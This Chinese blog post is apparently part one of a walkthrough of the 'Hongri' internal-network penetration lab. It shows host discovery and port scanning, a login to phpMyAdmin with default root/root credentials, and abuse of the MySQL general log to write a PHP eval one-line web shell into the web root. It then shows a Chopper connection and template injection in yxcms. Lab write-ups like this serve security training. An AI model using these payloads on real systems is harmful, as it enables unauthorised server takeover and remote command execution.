紅日靶場(內網滲透)——1
阿新 • • 發佈:2022-05-12
1.靶機資訊。
win7 x64:ip:192.168.248.129
2008: ip:192.168.138
win2k3:192.168.52.141
攻擊機資訊:
kali:整合各種攻擊工具 ip:192.168.248.128
win10:主要進行資料整理。
2.資訊蒐集。
1)使用kali掃描靶機
netdiscover -r 靶機IP網段
發現win7外網網址為:192.168.248.129
對192.168.248.129進行埠掃描。
發現開放埠80及3306.
確定使用HTTP和MYSQL服務。確定思路,使用SQL注入進行提權。
2)網站資訊蒐集
對網目錄進行掃描,發現phpmyadmin頁面:
同時發現網站頁面底部有mysql的連線測試檢測:
嘗試root/root,連線成功:
利用之前得到的資訊,直接登入phpmyadmin,直接對mysql進行管理:
3)利用sql進行getshell
利用步驟:
1.利用日誌檔案。
開啟日誌記錄以及日誌儲存目錄
SHOW VARIABLES LIKE '%general_log%'
SET GLOBAL general_log = "ON"
將日誌檔案儲存為php檔案
SET GLOBAL general_log_file="C:/phpStudy/www/1.php"
2.利用一句話馬
執行一句話馬
SELECT '<?php eval($_POST["cmd"]);?>';
利用菜刀進行連線:
發現beifen.rar,應該為網站原始碼,下載檢視。
開啟/yxcms/index.php,發現使用者名稱admin和密碼123456:
登入,發現可以進行前臺模板管理,注入一句話馬:
通過beifen.rar確定路徑後,菜刀連線,至此win7許可權已經獲取完畢。之後進行內網滲透,請見下一篇文章。